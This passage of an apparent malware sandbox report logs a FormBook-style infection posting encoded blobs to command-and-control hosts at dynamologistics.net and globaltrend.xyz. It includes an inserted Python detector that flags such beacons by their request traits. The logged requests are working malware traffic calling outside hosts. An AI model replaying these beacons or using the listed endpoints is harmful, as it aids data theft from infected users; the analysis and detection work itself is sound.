                                    Jul 11, 2024 15:06:52.573424101 CEST | 1236 | IN | Data Raw: 39 86 55 36 3f 4b 01 d9 98 0b d3 b3 c8 35 86 48 82 5c 40 61 be 2f 85 b2 04 c4 38 14 10 29 28 12 62 14 10 39 e6 58 9e 80 18 88 02 22 09 45 a2 0c b8 80 48 32 c7 f2 04 c4 40 14 10 49 28 12 61 2e 20 92 24 58 96 80 18 88 02 22 09 55 22 2c 08 88 1c 09
                                    Data Ascii: 9U6?K5H\@a/8)(b9X"EH2@I(a. $X"U",qx9p8]CSO*pas(KWC]9C"QVAUE9*"Ge(*pM"48SnH1$GjJ.4YR(*K<PKD'/
                                    Jul 11, 2024 15:06:52.573745012 CEST | 1236 | IN | Data Raw: 37 2b d9 5b 1e a3 8e 04 53 26 f3 d4 67 65 c2 d4 52 89 52 4b 05 82 29 12 71 a7 70 9e 46 18 4c 12 11 97 24 40 58 0a 11 57 02 67 0a 84 c1 a4 0f 71 a9 fe 95 15 8e 6b c5 95 c0 99 ea 60 30 89 43 5c ac 7d a1 d4 86 a8 12 34 4b 1a da 95 50 75 af 7d 09 d5
                                    Data Ascii: 7+[S&geRRK)qpFL$@XWgqk`0C\}4KPu}hc%HGOuwyDtT@HyHGDmHK<pIs!$pPajgz8L6[5#De5p9fD5p9j"[vT
                                    Jul 11, 2024 15:06:52.573755980 CEST | 1236 | IN | Data Raw: 27 c3 89 2e c1 73 0d 27 3a 19 8e 74 d1 50 c2 65 38 d2 2d f0 4c c3 29 1c 24 11 0c 27 3a 39 4a 38 0d 27 b6 14 f6 e4 67 0d a7 68 32 9c d8 e8 a8 08 d3 70 62 4b e1 3c c3 29 9a 1b 4e 54 32 54 44 69 38 71 2d f0 1c c3 29 98 0c 27 32 19 2a e2 34 9c c8 16
                                    Data Ascii: '.s':tPe8-L)$':9J8'gh2pbK<)NT2TDi8q-)'2*4xr%e'tR8l&iM^L+%#K>2rE)+:!Wgzd1qC*A3Xh 4]#QX,19i,1pRWiwktt"
                                    Jul 11, 2024 15:06:52.573765039 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                    Server: nginx
                                    Date: Thu, 11 Jul 2024 13:06:51 GMT
                                    Content-Type: text/html
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    X-Httpd-Modphp: 1
                                    Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                    X-Proxy-Cache-Info: DT:1
                                    Content-Encoding: gzip
                                    Data Raw: 34 62 39 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d 5b 73 1c b7 9a e4 fb f9 15 bd 9c d8 38 7b e9 6e d5 ad eb a2 23 79 d7 e3 99 89 f3 40 cf ec 2d bc b1 7e 71 b4 c8 96 c8 3d 2d 52 26 29 c9 3e 13 f3 df 37 3f 7c 99 a8 2a 14 d9 0d 3b 66 f7 69 ed 10 9b ec 2c 7c 89 02 32 01 14 50 85 7a f3 6f fe ee 9f be fb 1f ff eb bf fc fd ea e6 e9 e3 f1 9b 3f bc b1 8f d5 71 7f f7 e1 ed c5 e1 ee c2 be 38 ec af bf f9 c3 0a ff bd f9 78 78 da af ae 6e f6 0f 8f 87 a7 b7 17 9f 9f de 6f fa 8b d5 ab 29 78 b7 ff 78 78 7b f1 e5 f6 f0 f5 d3 fd c3 d3 c5 ea ea fe ee e9 70 87 83 bf de 5e 3f dd bc bd 3e 7c b9 bd 3a 6c c2 1f eb d5 ed dd ed d3 ed fe b8 79 bc da 1f 0f 6f cb 6d 01 ba 91 e7 e6 e9 e9 d3 e6 f0 f3 e7 db 2f 6f 2f ae f6 57 37 87 8d 05 7b b8 3f 4e a2 de dd 6f 1e 9f ee 1f 0e eb 8f fb 5f 36 fb 0f 87 b7 c5 b3 f9 79 b8 7f 77 ff f4 38 4b 77 7b 77 7d f8 65 3c f8 e9 f6 e9 78 f8 a6 29 9a d5 66 f5 8f f7 4f ab f7 f7 9f ef ae df bc f2 af 3d 53 c7 db bb bf ac 6e 1e 0e ef df 5e 58 d6 1e 5f bf 7a f5 1e 19 7a dc 7e b8 bf ff 70 3c ec 3f dd 3e [TRUNCATED]
                                    Data Ascii: 4b9e}[s8{n#y@-~q=-R&)>7?|*;fi,|2Pzo?q8xxno)xxx{p^?>|:lyom/o/W7{?No_6yw8Kw{w}e<x)fO=Sn^X_zz~p<?>n?z|OoOwXwEo^_\O7x?9[exa7zxP5a%w$n^:kB^8<YF8;YM(0tr#9<?}>#H$<vDKT=fyW`|}Z]=xzDbP?)C F*y X*y+Pj6XoI\}@+^=Bm!> >l&|5@1c|n?||BhG?[{-4yYZKJZOldrlOTXUul6>Y=??M5t}=\11
                                    Jul 11, 2024 15:06:52.573781967 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                    Server: nginx
                                    Date: Thu, 11 Jul 2024 13:06:51 GMT
                                    Content-Type: text/html
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    X-Httpd-Modphp: 1
                                    Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                    X-Proxy-Cache-Info: DT:1
                                    Content-Encoding: gzip
                                    Data Raw: 34 62 39 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d 5b 73 1c b7 9a e4 fb f9 15 bd 9c d8 38 7b e9 6e d5 ad eb a2 23 79 d7 e3 99 89 f3 40 cf ec 2d bc b1 7e 71 b4 c8 96 c8 3d 2d 52 26 29 c9 3e 13 f3 df 37 3f 7c 99 a8 2a 14 d9 0d 3b 66 f7 69 ed 10 9b ec 2c 7c 89 02 32 01 14 50 85 7a f3 6f fe ee 9f be fb 1f ff eb bf fc fd ea e6 e9 e3 f1 9b 3f bc b1 8f d5 71 7f f7 e1 ed c5 e1 ee c2 be 38 ec af bf f9 c3 0a ff bd f9 78 78 da af ae 6e f6 0f 8f 87 a7 b7 17 9f 9f de 6f fa 8b d5 ab 29 78 b7 ff 78 78 7b f1 e5 f6 f0 f5 d3 fd c3 d3 c5 ea ea fe ee e9 70 87 83 bf de 5e 3f dd bc bd 3e 7c b9 bd 3a 6c c2 1f eb d5 ed dd ed d3 ed fe b8 79 bc da 1f 0f 6f cb 6d 01 ba 91 e7 e6 e9 e9 d3 e6 f0 f3 e7 db 2f 6f 2f ae f6 57 37 87 8d 05 7b b8 3f 4e a2 de dd 6f 1e 9f ee 1f 0e eb 8f fb 5f 36 fb 0f 87 b7 c5 b3 f9 79 b8 7f 77 ff f4 38 4b 77 7b 77 7d f8 65 3c f8 e9 f6 e9 78 f8 a6 29 9a d5 66 f5 8f f7 4f ab f7 f7 9f ef ae df bc f2 af 3d 53 c7 db bb bf ac 6e 1e 0e ef df 5e 58 d6 1e 5f bf 7a f5 1e 19 7a dc 7e b8 bf ff 70 3c ec 3f dd 3e [TRUNCATED]
                                    Data Ascii: 4b9e}[s8{n#y@-~q=-R&)>7?|*;fi,|2Pzo?q8xxno)xxx{p^?>|:lyom/o/W7{?No_6yw8Kw{w}e<x)fO=Sn^X_zz~p<?>n?z|OoOwXwEo^_\O7x?9[exa7zxP5a%w$n^:kB^8<YF8;YM(0tr#9<?}>#H$<vDKT=fyW`|}Z]=xzDbP?)C F*y X*y+Pj6XoI\}@+^=Bm!> >l&|5@1c|n?||BhG?[{-4yYZKJZOldrlOTXUul6>Y=??M5t}=\11
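
The three sessions above, and the tail of the one before them, repeat one request shape: a POST or GET to a single-directory path (/s992/) on www.dynamologistics.net, one short-named parameter (bB, plus GX on the GET) carrying an opaque blob drawn from the base64 alphabet, a fixed Internet Explorer 7 User-Agent string, Connection: close, and a generic 404 in reply. The Python below is an added example, not part of the Joe Sandbox report and not FormBook's own code: it parses raw HTTP request text without percent-decoding (so the literal '+' and '/' in the blobs stay visible), extracts those fields and flags a request only when all five traits are present. The request samples are constructed here from the captured headers plus one ordinary browser request; the indicator names, the 40-character blob threshold and the 1-to-3-character parameter-name limit are assumptions chosen for this illustration, not documented FormBook constants.

```python
"""Flag FormBook-style HTTP beacons from raw request text.

Added example, not part of the sandbox report. Parses the request line,
headers, query string and form body without percent-decoding, then scores the
traits visible in the captured sessions. Indicator names and thresholds are
assumptions, not documented malware constants.
"""
import re

# Exact User-Agent string seen on every request in the capture.
LEGACY_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; "
             "SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
             "Media Center PC 6.0; .NET4.0C; .NET4.0E)")

MIN_BLOB_LEN = 40                                  # assumption: shortest payload value
B64_ALPHABET = re.compile(r"[A-Za-z0-9+/]+={0,2}")   # raw base64, not percent-encoded
SHORT_NAME = re.compile(r"[A-Za-z0-9]{1,3}")         # assumption: bB / GX style names
SINGLE_DIR = re.compile(r"/[A-Za-z0-9]{1,8}/")       # one short directory, e.g. /s992/


def _parse_form(encoded: str) -> dict:
    """Split k=v&k=v, keeping '+' and '/' literal so the blob alphabet is visible."""
    out = {}
    for pair in filter(None, encoded.strip().split("&")):
        key, _, value = pair.partition("=")
        out[key] = value
    return out


def parse_request(raw: str) -> dict:
    """Break one raw HTTP/1.x request into method, path, headers and parameters."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, target, _version = request_line.split(" ", 2)
    path, _, query = target.partition("?")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    params = _parse_form(query)
    if method == "POST" and headers.get("content-type", "").startswith(
            "application/x-www-form-urlencoded"):
        params.update(_parse_form(body))
    return {"method": method, "path": path, "headers": headers, "params": params}


def classify(raw: str) -> dict:
    """Return extracted fields, one boolean per indicator, and an all-of verdict."""
    req = parse_request(raw)
    params, headers = req["params"], req["headers"]
    values = list(params.values())
    indicators = {
        "single_dir_path": SINGLE_DIR.fullmatch(req["path"]) is not None,
        "short_param_names": bool(params) and all(SHORT_NAME.fullmatch(k) for k in params),
        "opaque_blob": bool(values)
                       and all(B64_ALPHABET.fullmatch(v) for v in values)
                       and max(len(v) for v in values) >= MIN_BLOB_LEN,
        "legacy_ie_ua": headers.get("user-agent") == LEGACY_UA,
        "connection_close": headers.get("connection", "").lower() == "close",
    }
    # Recorded but not required: the captured POSTs name their own host in Referer.
    referer_host = re.sub(r"^https?://([^/]+).*$", r"\1", headers.get("referer", ""))
    return {
        "method": req["method"],
        "host": headers.get("host", ""),
        "path": req["path"],
        "param_names": list(params),
        "self_referer": bool(referer_host) and referer_host == headers.get("host"),
        "indicators": indicators,
        "match": all(indicators.values()),
    }


# Constructed samples: the two beacons mirror the captured sessions, the third is benign.
POST_SAMPLE = (
    "POST /s992/ HTTP/1.1\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    "Host: www.dynamologistics.net\r\n"
    "Content-Length: 231\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Connection: close\r\n"
    "Origin: http://www.dynamologistics.net\r\n"
    "Referer: http://www.dynamologistics.net/s992/\r\n"
    f"User-Agent: {LEGACY_UA}\r\n"
    "\r\n"
    "bB=WN+Zz8ign4CoXg1uCyfgFSLT9noR6MmQXQwWJeaAsc3wUNdEgg9iRPOmZHuFNt1q50BQTc+L8hI5Et"
    "hyspeWvZyElEFCfQkzKRbRocNPC0X8A9KuzbicYjLzBaZqg9A7MSybRSjiuYh8ampXUSpQJ/mBSkxTpAu"
    "VyL6RjWpgiou6LlspI/KFxUmegL0OuZl1wvoEd4VvNVPp1vtcoA/qXSS3ZMFHZ48nlA=="
)
GET_SAMPLE = (
    "GET /s992/?bB=bPW5wL+6+Zn0FmJaaGSlZRyF0EkywNPIdxoHB7misPGpWoJmvT99WPeeVFPeE+QW7lFz"
    "ZIe3p3wvC9c3tru/pp3mulo7axc+TzXdoadqFnX1TrnWwrCFMVfzI6hQm88OLivvE0I=&GX=iP9xCL HTTP/1.1\r\n"
    "Host: www.dynamologistics.net\r\n"
    "Connection: close\r\n"
    f"User-Agent: {LEGACY_UA}\r\n"
    "\r\n"
)
BENIGN_SAMPLE = (
    "GET /search?q=hello+world&lang=en HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/126.0.0.0 Safari/537.36\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for sample in (POST_SAMPLE, GET_SAMPLE, BENIGN_SAMPLE):
        result = classify(sample)
        print(result["method"], result["host"], result["path"],
              result["param_names"], "MATCH" if result["match"] else "clean")
```

The 404 responses are deliberately not consulted: a generic error page says nothing about whether the server consumed the posted data, so the request side is where the indicators live. Requiring all five traits keeps an ordinary form submission (short field names, a '+' used as a space) from tripping the rule; relax the set only after checking what the relaxed version matches in your own proxy logs.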


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    16 | 192.168.2.6 | 49739 | 35.212.86.52 | 80 | 6784 | C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Jul 11, 2024 15:06:53.999547958 CEST | 586 | OUT | GET /s992/?bB=bPW5wL+6+Zn0FmJaaGSlZRyF0EkywNPIdxoHB7misPGpWoJmvT99WPeeVFPeE+QW7lFzZIe3p3wvC9c3tru/pp3mulo7axc+TzXdoadqFnX1TrnWwrCFMVfzI6hQm88OLivvE0I=&GX=iP9xCL HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Host: www.dynamologistics.net
                                    Connection: close
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Jul 11, 2024 15:06:54.462795019 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                    Server: nginx
                                    Date: Thu, 11 Jul 2024 13:06:54 GMT
                                    Content-Type: text/html
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    X-Httpd-Modphp: 1
                                    Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
                                    X-Proxy-Cache: MISS
                                    X-Proxy-Cache-Info: 0 NC:000000 UP:
                                    Data Raw: 31 33 64 34 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 [TRUNCATED]
                                    Data Ascii: 13d4b<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="cache-control" content="no-store,max-age=0" /> <meta name="robots" content="noindex" /> <title>404 - Not found</title> <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,700%7CRoboto:400,700" rel="stylesheet"><style> * { box-sizing: border-box; -moz-box-sizing: border-box; -webkit-tap-highlight-color: transparent; } body { margin: 0; padding: 0; height: 100%; -webkit-text-size-adjust: 100%; } .fit-wide { position: relative; overflow: hidden; max-width: 1240px; margin: 0 auto; padding-top: 60px; padding-bottom: 60px; padding-left: 20px; padding-right: 20px; } .background-wrap { positi
                                    Jul 11, 2024 15:06:54.462940931 CEST    1236    IN    Data Raw: 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 20 7d 0a 20 20 20 20 2e 62 61 63 6b 67 72 6f 75 6e 64 2d 77 72 61 70 2e 63 6c 6f 75 64 2d 62 6c 75 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 62 30 65 30 65 39 3b 20 7d 0a 20 20 20
                                    Data Ascii: on: relative; } .background-wrap.cloud-blue { background-color: #b0e0e9; } .background-wrap.white { background-color: #fff; } .title { position: relative; text-align: center; margin: 20px auto 10px; }
                                    Jul 11, 2024 15:06:54.462951899 CEST    1236    IN    Data Raw: 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 7d 0a 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 37 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72
                                    Data Ascii: margin: 0 auto; } @media screen and (max-width: 767px) { .error--bg__cover { display: none; } .abstract-half-dot--circle { left: 0; } }</style></head><body> <div id="container"> <section class="err
                                    Jul 11, 2024 15:06:54.462960005 CEST    1236    IN    Data Raw: 36 37 71 2d 2e 31 33 2c 30 2d 2e 32 36 31 2c 30 61 39 2e 39 33 33 2c 39 2e 39 33 33 2c 30 2c 30 2c 31 2d 36 2e 39 39 34 2d 33 2e 31 30 38 68 30 61 31 30 2c 31 30 2c 30 2c 31 2c 31 2c 37 2e 32 35 35 2c 33 2e 31 31 5a 6d 2d 2e 30 31 33 2d 31 38 61
                                    Data Ascii: 67q-.13,0-.261,0a9.933,9.933,0,0,1-6.994-3.108h0a10,10,0,1,1,7.255,3.11Zm-.013-18a8,8,0,0,0-5.793,13.511h0a8,8,0,1,0,6-13.509C750.134,449,750.063,449,749.994,449Z" fill="#226d7a"/><path d="M292.416,254.312a1.013,1.013,0,0,1-.417-.09L266.634,24
                                    Jul 11, 2024 15:06:54.462970972 CEST    1236    IN    Data Raw: 35 35 35 2c 31 2e 39 32 32 5a 4d 31 30 37 2c 32 32 38 61 35 2c 35 2c 30 2c 31 2c 31 2d 35 2c 35 41 35 2e 30 30 36 2c 35 2e 30 30 36 2c 30 2c 30 2c 31 2c 31 30 37 2c 32 32 38 5a 22 20 66 69 6c 6c 3d 22 23 32 32 36 64 37 61 22 2f 3e 3c 70 61 74 68
                                    Data Ascii: 555,1.922ZM107,228a5,5,0,1,1-5,5A5.006,5.006,0,0,1,107,228Z" fill="#226d7a"/><path d="M74.783,225.467l8.647,2.5a.989.989,0,0,0,.278.04,1,1,0,0,0,.276-1.962l-8.646-2.5a1,1,0,0,0-.555,1.922Z" fill="#226d7a"/><path d="M28.617,241.8a1,1,0,0,0,.7-.
                                    Jul 11, 2024 15:06:54.462980986 CEST    1236    IN    Data Raw: 31 2c 31 2c 30 2c 30 2c 30 2d 2e 35 35 34 2c 31 2e 39 32 32 6c 38 2e 36 34 36 2c 32 2e 35 61 31 2c 31 2c 30 2c 30 2c 30 2c 2e 32 31 36 2e 30 33 31 2c 37 2c 37 2c 30 2c 31 2c 30 2c 31 31 2e 39 38 2d 33 2e 32 6c 36 2e 30 30 36 2d 35 2e 38 32 35 61
                                    Data Ascii: 1,1,0,0,0-.554,1.922l8.646,2.5a1,1,0,0,0,.216.031,7,7,0,1,0,11.98-3.2l6.006-5.825a1,1,0,1,0-1.392-1.435ZM81,334a5,5,0,1,1,5-5A5.006,5.006,0,0,1,81,334Z" fill="#226d7a"/><path d="M103.687,304.486l-6.461,6.266a1,1,0,0,0,1.393,1.436l6.461-6.266a1
                                    Jul 11, 2024 15:06:54.463066101 CEST    1236    IN    Data Raw: 4d 38 38 36 2e 39 38 33 2c 31 36 32 2e 37 37 33 61 31 2c 31 2c 30 2c 30 2c 30 2c 2e 39 35 31 2d 31 2e 33 31 31 6c 2d 32 2e 38 2d 38 2e 35 35 35 61 31 2c 31 2c 30 2c 30 2c 30 2d 31 2e 39 2e 36 32 31 6c 32 2e 38 2c 38 2e 35 35 35 41 31 2c 31 2c 30
                                    Data Ascii: M886.983,162.773a1,1,0,0,0,.951-1.311l-2.8-8.555a1,1,0,0,0-1.9.621l2.8,8.555A1,1,0,0,0,886.983,162.773Z" fill="#226d7a"/><path d="M879.544,135.8a1,1,0,1,0-1.9.621l2.795,8.555a1,1,0,0,0,.951.69,1,1,0,0,0,.95-1.311Z" fill="#226d7a"/><path d="M90
                                    Jul 11, 2024 15:06:54.463076115 CEST    1236    IN    Data Raw: 32 61 31 2c 31 2c 30 2c 31 2c 30 2c 31 2e 36 2d 31 2e 32 5a 22 20 66 69 6c 6c 3d 22 23 32 32 36 64 37 61 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 39 36 32 2e 36 2c 32 34 30 2e 38 41 31 2c 31 2c 30 2c 30 2c 30 2c 39 36 31 2c 32 34 32 6c 35 2e 34 2c
                                    Data Ascii: 2a1,1,0,1,0,1.6-1.2Z" fill="#226d7a"/><path d="M962.6,240.8A1,1,0,0,0,961,242l5.4,7.2A1,1,0,0,0,968,248Z" fill="#226d7a"/><path d="M931.091,198.789a6.943,6.943,0,0,0,1.777-6.129l7.473-4.185a1,1,0,1,0-.977-1.745l-7.172,4.016a6.988,6.988,0,0,0-1
                                    Jul 11, 2024 15:06:54.463084936 CEST    1224    IN    Data Raw: 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 39 38 32 2c 32 36 31 61 36 2e 39 34 31 2c 36 2e 39 34 31 2c 30 2c 30 2c 30 2d 33 2e 35 32 37 2e 39 36 34 4c 39 37 33 2e 34 2c 32 35 35 2e 32 61 31 2c 31 2c 30 2c 31 2c 30 2d 31 2e 36 2c 31 2e 32 6c 35 2e 31 30
                                    Data Ascii: /><path d="M982,261a6.941,6.941,0,0,0-3.527.964L973.4,255.2a1,1,0,1,0-1.6,1.2l5.109,6.812A6.99,6.99,0,1,0,982,261Zm0,12a5,5,0,1,1,5-5A5.006,5.006,0,0,1,982,273Z" fill="#226d7a"/><path d="M19,32H11V24a1,1,0,0,0-2,0v8H1a1,1,0,0,0,0,2H9v8a1,1,0,0
                                    Jul 11, 2024 15:06:54.463093996 CEST    1236    IN    Data Raw: 2e 32 33 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 34 35 2e 37 34 32 20 39 38 2e 34 32 39 20 31 34 37 2e 35 38 31 20 39 36 2e 33 31 36 20 31 34 35 2e 37 34 32 20 39 34 2e 32 30 32 20 31
                                    Data Ascii: .235" fill="#fff"/><polygon points="145.742 98.429 147.581 96.316 145.742 94.202 143.904 96.316 145.742 98.429" fill="#fff"/><polygon points="145.742 86.624 147.581 84.51 145.742 82.396 143.904 84.51 145.742 86.624" fill="#fff"/><polygon point
                                    Jul 11, 2024 15:06:54.467915058 CEST    1236    IN    Data Raw: 36 2e 32 38 38 20 38 32 2e 33 39 36 20 31 36 34 2e 34 35 20 38 34 2e 35 31 20 31 36 36 2e 32 38 38 20 38 36 2e 36 32 34 20 31 36 38 2e 31 32 38 20 38 34 2e 35 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e
                                    Data Ascii: 6.288 82.396 164.45 84.51 166.288 86.624 168.128 84.51" fill="#fff"/><polygon points="176.563 129.621 174.724 131.734 176.563 133.848 178.401 131.734 176.563 129.621" fill="#fff"/><polygon points="176.563 117.814 174.724 119.928 176.563 122.04


                                    Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                    17    192.168.2.6    49740    188.114.96.3    80    6784    C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Timestamp    Bytes transferred    Direction    Data
                                    Jul 11, 2024 15:06:59.761285067 CEST    847    OUT    POST /srh8/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.globaltrend.xyz
                                    Content-Length: 207
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.globaltrend.xyz
                                    Referer: http://www.globaltrend.xyz/srh8/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 46 53 77 6f 4f 6d 71 72 38 59 6f 46 4d 68 41 43 58 63 44 47 53 4d 4a 4c 57 50 30 4e 37 6b 39 38 4e 54 64 4c 46 55 79 51 76 48 31 36 42 73 6d 74 57 47 6f 63 42 4e 75 6c 38 39 37 30 55 66 47 36 74 71 74 6c 62 7a 64 36 46 6f 59 76 6e 36 4a 54 59 7a 2f 76 54 58 48 35 43 2f 64 79 52 55 6d 57 52 65 49 47 6b 55 59 35 73 56 59 44 35 41 6a 46 55 67 62 50 77 42 46 57 38 57 57 78 52 68 55 78 58 6b 68 49 51 67 41 61 37 4d 53 34 54 62 66 53 37 65 52 6f 74 59 6c 48 37 6c 6a 47 31 4d 32 4c 47 7a 4c 36 71 41 4a 6a 62 4b 54 39 79 51 53 58 75 69 4a 66 6a 6f 50 49 54 57 41 41 72 58 36 69 2b 72 4b 36 7a 79 67 39 4c 4b 59 67
                                    Data Ascii: bB=FSwoOmqr8YoFMhACXcDGSMJLWP0N7k98NTdLFUyQvH16BsmtWGocBNul8970UfG6tqtlbzd6FoYvn6JTYz/vTXH5C/dyRUmWReIGkUY5sVYD5AjFUgbPwBFW8WWxRhUxXkhIQgAa7MS4TbfS7eRotYlH7ljG1M2LGzL6qAJjbKT9yQSXuiJfjoPITWAArX6i+rK6zyg9LKYg
                                    Jul 11, 2024 15:07:00.483117104 CEST    661    IN    HTTP/1.1 301 Moved Permanently
                                    Date: Thu, 11 Jul 2024 13:07:00 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Location: http://www.globaltrend.xyz
                                    X-Powered-By: PHP/7.4.6
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NpSRvluX1cFWqa5lkkXHCUqtYOCH0yCdwYXgQSldA4EyM6x%2BgoA3rgFZFA8xg54jgo%2FwsrDGnH4eAYXy0JCoKy5xXocFBj89bcGs%2FGpDRc6frOknQNWRz4%2BrKXSh7SpXFuEB0NBf"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8a190395ebe143fd-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                    18    192.168.2.6    49741    188.114.96.3    80    6784    C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Timestamp    Bytes transferred    Direction    Data
                                    Jul 11, 2024 15:07:02.361686945 CEST    871    OUT    POST /srh8/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.globaltrend.xyz
                                    Content-Length: 231
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.globaltrend.xyz
                                    Referer: http://www.globaltrend.xyz/srh8/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
